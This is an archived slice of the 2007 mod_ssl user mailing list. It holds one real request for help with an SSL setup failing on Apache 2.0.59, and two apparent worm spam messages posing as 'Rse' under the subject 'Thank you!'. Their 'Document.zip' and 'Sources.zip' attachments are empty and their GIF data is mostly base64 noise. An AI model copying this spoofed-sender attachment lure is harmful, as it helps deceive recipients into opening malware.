mWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb//5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkz
mZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZAJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnM
mZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwAM8wAZswAmcwAzMwA/8wzAMwzM8wzZswz
mcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZZsyZmcyZzMyZ/8zMAMzMM8zMZszM
mczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8Amf8AzP8A//8zAP8zM/8zZv8z
mf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+ZzP+Z///MAP/MM//MZv/M
mf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAB4AA8AAAj/AP8JHEiwoMGD
CBMqXMiwocOHECNKnEixosWLGDNqnJhvRosoHg/l20ix2oxVCmeAbDHQo8eWLltGaTFjIE2a
JaM8GxglEMmJ1XQmzNcC5cB8UYwK3Fa0YFKC1a4onbhqRjWbNX9GrHoVYdBYBJ+16CpQLNiB
1ZqiVUtxVYuRAnv+i0Uz0Mhtz2ZcObQNb4sWfK9kDRRF4CqU+Q5FiXL23yqppf5VCxSo2qoo
I/8adEvWsVWCjztzBf25osqlnGNh7tjlX6mse54dYpkv0LPL/4jWDJoZJdOd/7r8jYUUZdrC
/04XfL2nssDXlOGWakG5a6AWzeEGutIl0LaJ2zx+/5xRqvM/uR6ffT/fgrjhmpQLrzr079AV
uB8FXvHpWSBR/glt0xF/3w141H9HhUdgPkgBCFFQUwkUy2HX7TSZSldV08UVUWTIUodRbNPh
eVklVxNTRs0kkEnALZQfQSoS1MIVTrEEY4kPjlXQIVblE0tpkmlW1mkQ0ncSff+8SJRxOiaJ
XFDmEVQKjUnSVwpygNVnI3VaCtRCZIp5iWRE061nU2HbECZZiOcdktc/TEXWUQvfzdgVZ45R
ad+dVqU1Q2Y4GoZZWiPNto1JhQ5qI25ifefWoW9NFEiguXUxw48sbeMWeSO5ldR6ciUX2UCq
fbneHjbmRhlTVMZYkFurkEd1mXOGAQaXY6YONKtWvPbq60OL/UXTTCvNIF6xyM5400fDKive
X1coS+xfwYKkkrAgzfSXR9ZmO+O1wm4rrLHBbksspQQFBAA7n1L/f/9//3//f/9//3//f/9/
/3//f/9//3//f18IXwj/f/9//3//f/9/XwhfCP9//3//f/9//39fCF8I/3//f/9//3//f18I
Xwj/f/9//3//f/9/XwhfCP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
v3dfCF8IXwhfCF8IH0J/b/9//3//f/9//39fCH8t/39fCF8I31q/d/9//39fCF8I31q/d/9/
/3+fUl8I/3/fOX8tXwj/f19KX0r/fx9CXwifc/9//39fCF8I/3/fe18Ify3/f/9/n1JfCL93
/39/b18I3zn/f/9//3//f/9//3//f/9//3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9/
/3+/d793v3dfCN85/3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//39fCF8I/3//f793H0JfCH9vv1ZfCL93v3dfCH8t
/3/fOV8I/3+fc38tn1LfOV8I/3+fc38tn1JfSl8I/39fa18IXwj/f59zXwifc59zXwifUv9/
X2tfCL9W/3//f38tXwhfCL9Wn3NfCJ9S/3+fUl8IXwj/f/9/XwhfCP9//3//f/9//3//f985
Xwh/LX8tf2//f/9/3zlfCH8tfy1/b/9//3/fOV8Ify1/LX9v/3//f985Xwh/LX8tf2//f/9/
3zlfCH8tfy1/b/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//39fSl8I
n3P/f/9/v3dfCN8533ufUl8IXwjfOX9v/3+/d59SXwhfCB9Cv3e/d59SXwhfCB9Cv3dfCF8I
/3//f985Xwj/f/9/X0pfSv9/f28fQl8IXwi/Vv9//3//f19KXwi/Vt85/39fa38t3zk/Zx9C
Xwifc/9/XwhfCP9//3//f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3+fUl8I
P2f/f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3+/Vl8IP2f/f/9//39fCF8I/3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f79WXwg/Z/9//3//f/9//3//f/9//3//fx9jXwi/Vv9/
/3//f/9/H2NfCL9W/3//f/9//38fY18Iv1b/f/9//3//fx9jXwi/Vv9//3//f/9/H2NfCL9W
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//38/Z18I31r/f/9/
f29fCN85/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//fz9nXwjfWv9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3+fc18IX0r/f/9/
/3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3+fc18IXwhfCF8IXwgfQr93/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9//3//f/9//3//f/9/XwhfCF8IXwj/f/9/
/39fCF8IXwhfCP9//3//f18IXwhfCF8I/3//f/9/XwhfCF8IXwj/f/9//39fCF8IXwhfCP9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Document.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Document.zip"



----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Sources.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Sources.zip"



----------vvvvvvvvvvvvvvvvvvvv--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb  1 04:05:30 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2E00F14D87D; Thu,  1 Feb 2007 04:05:30 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from megatron.net (rrcs-24-97-204-25.nys.biz.rr.com [24.97.204.25])
	by master.modssl.org (Postfix) with SMTP id 2D08314D86D
	for ; Thu,  1 Feb 2007 04:05:28 +0100 (CET)
Date: Wed, 31 Jan 2007 22:17:32 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: Re: Thank you!
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------vvvvvvvvvvvvvvvvvvvv"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit






----------vvvvvvvvvvvvvvvvvvvv
Content-Type: image/gif; name="vvvvvvvvvv.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="vvvvvvvvvv.gif"
Content-ID: 

R0lGODlheAAPAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A
/wD//////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAz
mQAzzAAz/wBmAABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDM
mQDMzADM/wD/AAD/MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMz
mTMzzDMz/zNmADNmMzNmZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPM
mTPMzDPM/zP/ADP/MzP/ZjP/mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYz
mWYzzGYz/2ZmAGZmM2ZmZmZmmWZmzGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbM
mWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb//5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkz
mZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZAJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnM
mZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwAM8wAZswAmcwAzMwA/8wzAMwzM8wzZswz
mcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZZsyZmcyZzMyZ/8zMAMzMM8zMZszM
mczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8Amf8AzP8A//8zAP8zM/8zZv8z
mf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+ZzP+Z///MAP/MM//MZv/M
mf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAB4AA8AAAj/AP8JHEiwoMGD
CBMqXMiwocOHECNKnEixosWLGDNqnJhvRosoHg/l20ix2oxVCmeAbDHQo8eWLltGaTFjIE2a
JaM8GxglEMmJ1XQmzNcC5cB8UYwK3Fa0YFKC1a4onbhqRjWbNX9GrHoVYdBYBJ+16CpQLNiB
1ZqiVUtxVYuRAnv+i0Uz0Mhtz2ZcObQNb4sWfK9kDRRF4CqU+Q5FiXL23yqppf5VCxSo2qoo
I/8adEvWsVWCjztzBf25osqlnGNh7tjlX6mse54dYpkv0LPL/4jWDJoZJdOd/7r8jYUUZdrC
/04XfL2nssDXlOGWakG5a6AWzeEGutIl0LaJ2zx+/5xRqvM/uR6ffT/fgrjhmpQLrzr079AV
uB8FXvHpWSBR/glt0xF/3w141H9HhUdgPkgBCFFQUwkUy2HX7TSZSldV08UVUWTIUodRbNPh
eVklVxNTRs0kkEnALZQfQSoS1MIVTrEEY4kPjlXQIVblE0tpkmlW1mkQ0ncSff+8SJRxOiaJ
XFDmEVQKjUnSVwpygNVnI3VaCtRCZIp5iWRE061nU2HbECZZiOcdktc/TEXWUQvfzdgVZ45R
ad+dVqU1Q2Y4GoZZWiPNto1JhQ5qI25ifefWoW9NFEiguXUxw48sbeMWeSO5ldR6ciUX2UCq
fbneHjbmRhlTVMZYkFurkEd1mXOGAQaXY6YONKtWvPbq60OL/UXTTCvNIF6xyM5400fDKive
X1coS+xfwYKkkrAgzfSXR9ZmO+O1wm4rrLHBbksspQQFBAA7n1L/f/9//3//f/9//3//f/9/
/3//f/9//3//f18IXwj/f/9//3//f/9/XwhfCP9//3//f/9//39fCF8I/3//f/9//3//f18I
Xwj/f/9//3//f/9/XwhfCP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
v3dfCF8IXwhfCF8IH0J/b/9//3//f/9//39fCH8t/39fCF8I31q/d/9//39fCF8I31q/d/9/
/3+fUl8I/3/fOX8tXwj/f19KX0r/fx9CXwifc/9//39fCF8I/3/fe18Ify3/f/9/n1JfCL93
/39/b18I3zn/f/9//3//f/9//3//f/9//3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9/
/3+/d793v3dfCN85/3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//39fCF8I/3//f793H0JfCH9vv1ZfCL93v3dfCH8t
/3/fOV8I/3+fc38tn1LfOV8I/3+fc38tn1JfSl8I/39fa18IXwj/f59zXwifc59zXwifUv9/
X2tfCL9W/3//f38tXwhfCL9Wn3NfCJ9S/3+fUl8IXwj/f/9/XwhfCP9//3//f/9//3//f985
Xwh/LX8tf2//f/9/3zlfCH8tfy1/b/9//3/fOV8Ify1/LX9v/3//f985Xwh/LX8tf2//f/9/
3zlfCH8tfy1/b/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//39fSl8I
n3P/f/9/v3dfCN8533ufUl8IXwjfOX9v/3+/d59SXwhfCB9Cv3e/d59SXwhfCB9Cv3dfCF8I
/3//f985Xwj/f/9/X0pfSv9/f28fQl8IXwi/Vv9//3//f19KXwi/Vt85/39fa38t3zk/Zx9C
Xwifc/9/XwhfCP9//3//f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3+fUl8I
P2f/f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3+/Vl8IP2f/f/9//39fCF8I/3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f79WXwg/Z/9//3//f/9//3//f/9//3//fx9jXwi/Vv9/
/3//f/9/H2NfCL9W/3//f/9//38fY18Iv1b/f/9//3//fx9jXwi/Vv9//3//f/9/H2NfCL9W
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//38/Z18I31r/f/9/
f29fCN85/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//fz9nXwjfWv9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3+fc18IX0r/f/9/
/3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3+fc18IXwhfCF8IXwgfQr93/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9//3//f/9//3//f/9/XwhfCF8IXwj/f/9/
/39fCF8IXwhfCP9//3//f18IXwhfCF8I/3//f/9/XwhfCF8IXwj/f/9//39fCF8IXwhfCP9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Document.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Document.zip"



----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Sources.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Sources.zip"



----------vvvvvvvvvvvvvvvvvvvv--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb  2 14:00:35 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2466114D873; Fri,  2 Feb 2007 14:00:35 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from bmapps.persistent.co.in (outgoing.persistent.co.in [202.54.11.87])
	by master.modssl.org (Postfix) with ESMTP id B5D6E14D83F
	for ; Fri,  2 Feb 2007 14:00:31 +0100 (CET)
Received: from bmapps.persistent.co.in (unknown [127.0.0.1])
	by bmapps.persistent.co.in (Symantec Mail Security) with ESMTP id 6230B52812E
	for ; Fri,  2 Feb 2007 18:29:10 +0530 (IST)
X-AuditID: 0a4e0006-9ebb0bb000007bc3-f0-45c3359eda65 
Received: from mail.persistent.co.in (unknown [10.78.0.1])
	by bmapps.persistent.co.in (Symantec Mail Security) with ESMTP id 065824E4002
	for ; Fri,  2 Feb 2007 18:29:10 +0530 (IST)
Received: from ps3603 ([10.77.199.172])
	by mail.persistent.co.in (MOS 3.8.2-GA)
	with ESMTP id BDG90079 (AUTH shyam_shukla);
	Fri, 2 Feb 2007 18:30:01 +0530 (IST)
From: "Shyam Shukla " 
To: 
Subject: Problem in Setting Up SSL
Date: Fri, 2 Feb 2007 18:30:01 +0530
Message-ID: <00f001c746ca$0c8d1860$acc74d0a@persistent.co.in>
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_00F1_01C746F8.26455460"
X-Mailer: Microsoft Office Outlook 11
Thread-Index: AcdGygx6B7O6gb6YTrGtK2ATe8OGWw==
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1896
X-Brightmail-Tracker: AAAAAA==
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Shyam Shukla " 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_00F1_01C746F8.26455460
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit 

Hi All,

 

I am getting problem in setting up SSL in apache 2.0.59 in linux platform.

I followed the steps as below:

 

1- Created a self signed ca cert.

2- Created a server cert using the same ca.

3- Created two directories ssl.crt and ssl.key under
apache_server_home_dir/conf to put ca, server cert and private key.

4- Modified ssl.conf file to define ssl port, server name, path to
certificates etc.

 

I did all the steps that I had done previously with apache 2.0.52, which was
working in ssl mode but in case of apache 2.0.59, it does not start up at
all.

 

When I try to access through browser, for e.g. https://hostname:2443
 , I get the message "page can not be displayed".

 

Can anyone guide me where am I going wrong or could send me some documents
to setup ssl in apache 2.0.59?

 

 

 

Best Regards,
Shyam Shukla



 


DISCLAIMER
==========
This e-mail may contain privileged and confidential information which is the property of Persistent Systems Pvt. Ltd. It is intended only for the use of the individual or entity to which it is addressed. If you are not the intended recipient, you are not authorized to read, retain, copy, print, distribute or use this message. If you have received this communication in error, please notify the sender and delete all copies of this message. Persistent Systems Pvt. Ltd. does not accept any liability for virus infected mails.

------=_NextPart_000_00F1_01C746F8.26455460
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable 
















Hi All,



 



I am getting problem in setting up SSL in apache 2.0.59 i=
n
linux platform.



I followed the steps as below:


 



1- Created a self signed ca cert.



2- Created a server cert using the same ca.



3- Created two directories ssl.crt and ssl.key under
apache_server_home_dir/conf to put ca, server cert and private key.



4- Modified ssl.conf file to define ssl port, server name=
,
path to certificates etc.



 



I did all the steps that I had done previously with apach=
e
2.0.52, which was working in ssl mode but in case of apache 2.0.59, it does=
 not
start up at all.



 



When I try to access through browser, for e.g. https://hostname:2443, I get the message=
 “page can not be displayed”.=




 



Can anyone guide me where am I going wrong or could send=
 me
some documents to setup ssl in apache 2.0.59?



 



 



 



Best Regards,

Shyam Shukla







 






DISCLAIMER=0A=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=0A=
This e-mail may contain privileged and confidential information which is the=
 property of Persistent Systems Pvt. Ltd. It is intended only for the use of=
 the individual or entity to which it is addressed. If you are not the inten=
ded recipient, you are not authorized to read, retain, copy, print, distribu=
te or use this message. If you have received this communication in error, pl=
ease notify the sender and delete all copies of this message. Persistent Sys=
tems Pvt. Ltd. does not accept any liability for virus infected mails.





------=_NextPart_000_00F1_01C746F8.26455460--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb  2 16:02:39 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 0754214D872; Fri,  2 Feb 2007 16:02:39 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from megatron.net (rrcs-24-97-204-25.nys.biz.rr.com [24.97.204.25])
	by master.modssl.org (Postfix) with SMTP id 4802614D83F
	for ; Fri,  2 Feb 2007 16:02:35 +0100 (CET)
Date: Fri, 02 Feb 2007 10:14:46 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: Re: Thank you!
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------vvvvvvvvvvvvvvvvvvvv"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit






----------vvvvvvvvvvvvvvvvvvvv
Content-Type: image/gif; name="vvvvvvvvvv.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="vvvvvvvvvv.gif"
Content-ID: 

R0lGODlheAAPAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A
/wD//////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAz
mQAzzAAz/wBmAABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDM
mQDMzADM/wD/AAD/MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMz
mTMzzDMz/zNmADNmMzNmZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPM
mTPMzDPM/zP/ADP/MzP/ZjP/mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYz
mWYzzGYz/2ZmAGZmM2ZmZmZmmWZmzGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbM
mWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb//5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkz
mZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZAJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnM
mZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwAM8wAZswAmcwAzMwA/8wzAMwzM8wzZswz
mcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZZsyZmcyZzMyZ/8zMAMzMM8zMZszM
mczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8Amf8AzP8A//8zAP8zM/8zZv8z
mf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+ZzP+Z///MAP/MM//MZv/M
mf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAB4AA8AAAj/AP8JHEiwoMGD
CBMqXMiwocOHECNKnEixosWLGDNqnJhvRosoHg/l20ix2oxVCmeAbDHQo8eWLltGaTFjIE2a
JaM8GxglEMmJ1XQmzNcC5cB8UYwK3Fa0YFKC1a4onbhqRjWbNX9GrHoVYdBYBJ+16CpQLNiB
1ZqiVUtxVYuRAnv+i0Uz0Mhtz2ZcObQNb4sWfK9kDRRF4CqU+Q5FiXL23yqppf5VCxSo2qoo
I/8adEvWsVWCjztzBf25osqlnGNh7tjlX6mse54dYpkv0LPL/4jWDJoZJdOd/7r8jYUUZdrC
/04XfL2nssDXlOGWakG5a6AWzeEGutIl0LaJ2zx+/5xRqvM/uR6ffT/fgrjhmpQLrzr079AV
uB8FXvHpWSBR/glt0xF/3w141H9HhUdgPkgBCFFQUwkUy2HX7TSZSldV08UVUWTIUodRbNPh
eVklVxNTRs0kkEnALZQfQSoS1MIVTrEEY4kPjlXQIVblE0tpkmlW1mkQ0ncSff+8SJRxOiaJ
XFDmEVQKjUnSVwpygNVnI3VaCtRCZIp5iWRE061nU2HbECZZiOcdktc/TEXWUQvfzdgVZ45R
ad+dVqU1Q2Y4GoZZWiPNto1JhQ5qI25ifefWoW9NFEiguXUxw48sbeMWeSO5ldR6ciUX2UCq
fbneHjbmRhlTVMZYkFurkEd1mXOGAQaXY6YONKtWvPbq60OL/UXTTCvNIF6xyM5400fDKive
X1coS+xfwYKkkrAgzfSXR9ZmO+O1wm4rrLHBbksspQQFBAA7n1L/f/9//3//f/9//3//f/9/
/3//f/9//3//f18IXwj/f/9//3//f/9/XwhfCP9//3//f/9//39fCF8I/3//f/9//3//f18I
Xwj/f/9//3//f/9/XwhfCP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
v3dfCF8IXwhfCF8IH0J/b/9//3//f/9//39fCH8t/39fCF8I31q/d/9//39fCF8I31q/d/9/
/3+fUl8I/3/fOX8tXwj/f19KX0r/fx9CXwifc/9//39fCF8I/3/fe18Ify3/f/9/n1JfCL93
/39/b18I3zn/f/9//3//f/9//3//f/9//3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9/
/3+/d793v3dfCN85/3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//39fCF8I/3//f793H0JfCH9vv1ZfCL93v3dfCH8t
/3/fOV8I/3+fc38tn1LfOV8I/3+fc38tn1JfSl8I/39fa18IXwj/f59zXwifc59zXwifUv9/
X2tfCL9W/3//f38tXwhfCL9Wn3NfCJ9S/3+fUl8IXwj/f/9/XwhfCP9//3//f/9//3//f985
Xwh/LX8tf2//f/9/3zlfCH8tfy1/b/9//3/fOV8Ify1/LX9v/3//f985Xwh/LX8tf2//f/9/
3zlfCH8tfy1/b/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//39fSl8I
n3P/f/9/v3dfCN8533ufUl8IXwjfOX9v/3+/d59SXwhfCB9Cv3e/d59SXwhfCB9Cv3dfCF8I
/3//f985Xwj/f/9/X0pfSv9/f28fQl8IXwi/Vv9//3//f19KXwi/Vt85/39fa38t3zk/Zx9C
